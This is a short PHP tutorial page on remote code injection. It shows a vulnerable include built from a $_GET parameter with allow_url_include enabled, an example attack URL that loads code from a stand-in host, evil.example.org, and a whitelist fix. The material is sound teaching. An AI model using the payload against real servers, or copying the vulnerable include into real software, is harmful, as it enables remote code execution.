- Php
- Features
- Autoload
- Class Reflection
- Magic Methods
- Exceptions
- Late Static Binding
- Type Hinting
- SPL
- PHPUNIT
- PHAR
- Composer
- Guzzle
- Carbon
- Faker
- Math
- Requests
- Design Patterns
- Singleton Pattern
- Observer Pattern
- Strategy Pattern
- Registry
- Symfony
- Routes
- Annotations
- Flex
- Controllers
- Doctrine
- Templating
- Versions
- Php7.4
- Php8.0
- Security
- Filter Input
- Remote Code Injection ♣
- Sql Injection
- Session Fixation
- File Uploads
- Cross Site Scripting
- Spoofed Forms
- CSRF
- Session Hijacking
- Modern Php
- Composer
- Slim Framework
- Autoloader
- Package
- Releases
- Generators
- Dependency Injection
- Middleware
- Create Framework
- App
- Http Foundation
- Front Controller
- Routing
- Render Controller
- Resolver
- SoC
- Frameworks
- Symfony V5
- Laravel V8
- Laminas V3
- Codeigniter V4
Remote code injection
A remote code injection attack occurs when an attacker to execute PHP code.
ini_set("allow_url_include", 1);
include "{$_GET['section']}/data.inc.php";
// http://example.org/?section=evil.example.org/attack.php
// include "http://evil.example.org/attack.php?data.inc.php"; // Look Here
Protection
Filter all input and never use tainted data in an include or require.
ini_set("allow_url_include", 1);
$sections = array('home', 'news', 'photos', 'blog');
$section = in_array($_GET['section'], $sections) ? $_GET['section'] : 'home';
include "$section/data.inc.php";
Last update: 34 days ago
